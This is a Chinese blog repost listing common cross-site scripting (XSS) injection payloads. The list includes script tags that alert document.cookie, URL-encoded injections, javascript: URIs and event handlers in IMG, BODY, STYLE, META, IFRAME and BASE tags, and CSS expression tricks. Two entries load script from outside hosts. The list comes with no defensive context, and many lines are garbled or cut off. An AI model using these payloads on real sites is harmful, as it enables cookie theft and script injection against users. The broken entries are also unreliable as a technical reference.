XSS注入常用语句

XSS注入常用语句lt script gt alert hello gaga lt script gt 经典语句 哈哈 gt gt lt imgsrc javascript alert XSS gt gt gt lt script gt alert XSS lt script gt lt table



//经典语句,哈哈!

>”‘>XSS注入常用语句

>”‘>




“+alert(‘XSS’)+”

‘>

=’><

script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

<s&#99;ript>alert(‘XSS’)

<

img src=“javascript:alert(‘XSS’)”>

%0a%0a<script>alert(\“Vulnerable\”).jsp

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

a.jsp/

“><











script>alert(‘Vulnerable’)</script>

XSS注入常用语句XSS‘)>

XSS注入常用语句XSS‘)>

XSS注入常用语句

XSS‘);”>

XSS‘);”>

XSS注入常用语句“;’

>out

<

IMG SRC=” javascript.:alert(‘XSS’);”>

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<BODY BACKGROUND=“javascript.:alert(‘XSS’)”>

<BODY ONLOAD=alert(‘XSS’)>

<IMG DYNSRC=“javascript.:alert(‘XSS’)”>

<IMG LOWSRC=“javascript.:alert(‘XSS’)”>

<BGSOUND SRC=“javascript.:alert(‘XSS’);”>

<br size=“&{alert(‘XSS’)}”>

<LAYER SRC=“http://xss.ha.ckers.org/a.js”></layer>

<LINK REL=“stylesheet”HREF=“javascript.:alert(‘XSS’);”>

<IMG SRC=‘vbscript.:msgbox(“XSS”)’>

<META. HTTPEQUIV=“refresh”CONTENT=“0;url=javascript.:alert(‘XSS’);”>

<IFRAME. src=“/javascript.:alert”(‘XSS’)></IFRAME>

<FRAMESET><FRAME. src=“/javascript.:alert”(‘XSS’)></FRAME></FRAMESET>

<TABLE BACKGROUND=“javascript.:alert(‘XSS’)”>

<DIV STYLE=“background-image: url(javascript.:alert(‘XSS’))”>

<DIV STYLE=“behaviour: url(‘http://www.how-to-hack.org/exploit.html’);”>

<DIV STYLE=“width: expression(alert(‘XSS’));”>

<STYLE>@im\port‘\ja\vasc\ript:alert(“XSS”)’;</STYLE>

<IMG STYLE=‘xss:expre\ssion(alert(“XSS”))’>

<STYLE. TYPE=“text/javascript”>alert(‘XSS’);</STYLE>

<STYLE. TYPE=“text/css”>.XSS{
backgroundimage:url(“javascript.:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>

<STYLE. type=“text/css”>BODY{
background:url(“javascript.:alert(‘XSS’)”)}</STYLE>

<BASE HREF=“javascript.:alert(‘XSS’);//”>

getURL(“javascript.:alert(‘XSS’)”)

a=“get”;b=“URL”;c=


















































版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/211261.html原文链接:https://javaforall.net

(0)
上一篇 2026年3月18日 下午10:50
下一篇 2026年3月18日 下午10:51


相关推荐

  • 手机浏览器唤起微信实现分享

    手机浏览器唤起微信实现分享

    2021年10月28日
    38
  • Pycharm中运行Python代码的三种方式

    Pycharm中运行Python代码的三种方式在 pycharm 中的 Python 代码运行会出现各种奇葩的问题 比如 密码输入时不显示或没有提示 给我们带来一些麻烦 下面介绍几种代码运行的几种方式 一 直接运行 Run 按钮或者快捷键 shift F10 1 进入 pychram 主界面 输入代码后 直接 Run 就可以 2 Termnal 下运行 py 文件在 pycharm 的主界面 点 termnal 进入命令面板 选择路径 回车键执行相应的文件 python 文件名 py 3 终端命令行 1 gt 进入 pycharm 主界面 选中要执行的文件或目录 2 gt

    2026年3月27日
    2
  • 第二篇 FastAI数据准备「建议收藏」

    第二篇 FastAI数据准备「建议收藏」一、FastAI代码组织结构(文档链接)FastAI库主要涉及神经网络在如下四个领域的应用:collab(协同滤波问题)、tabular(结构化数据或者说表格数据处理)、text(自然语言处理)、vision(机器视觉)。对每一领域(除了collab),其下又会按照如下结构组织代码:(1)data:定义了模型所需的数据集类。(2)transform:数据预处理(如对图像数据的图像…

    2025年10月5日
    7
  • fvwm配置_nvme ngff

    fvwm配置_nvme ngff  习惯了Gnome与KDE的生活,是不是有时候也觉得太过于繁琐?花了几天时间,终于配置好了我的FVWM………… 正如王垠博士说的那样   无比强大!!!!!体验了  自己操控电脑的感觉啊还是那句话,在Linux的世界里,我就是上帝!有需求的人,我们一起探讨一下配置哈! 下面贴我的配置文件:####添加图标路径##########ImagePath/hom

    2022年10月3日
    4
  • Qt QTreeWidget 详解[通俗易懂]

    Qt QTreeWidget 详解[通俗易懂]一.基础设置1.添加顶层节点//添加顶层节点QTreeWidgetItem*topItem1=newQTreeWidgetItem(ui->treeWidget);topItem1->setText(0,”百度”);ui->treeWidget->addTopLevelItem(topItem1);2.设置表头隐藏,展开所有项//隐藏表头ui->treeWidget->setHeade.

    2022年10月1日
    3
  • opc服务器网站,OPC 服务器[通俗易懂]

    opc服务器网站,OPC 服务器[通俗易懂]OPC服务器OPC服务器,是指按照OPC基金组织规定的OPC规范群开发的软件驱动。OPC服务器作为中间媒介负责从数据源读取数据再跟另外一端的客户端通信。在OPC客户端/服务器的结构图中,通信的发起端是,也只能是OPC客户端。客户端和服务器的对话是双向的,也就是说,客户端既可以从服务器读出也可以向服务器写入。TOPC基金会定义了四种不同类型的OPC服务器。他们分别是:OPC数据访问服务器…

    2022年6月20日
    34

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号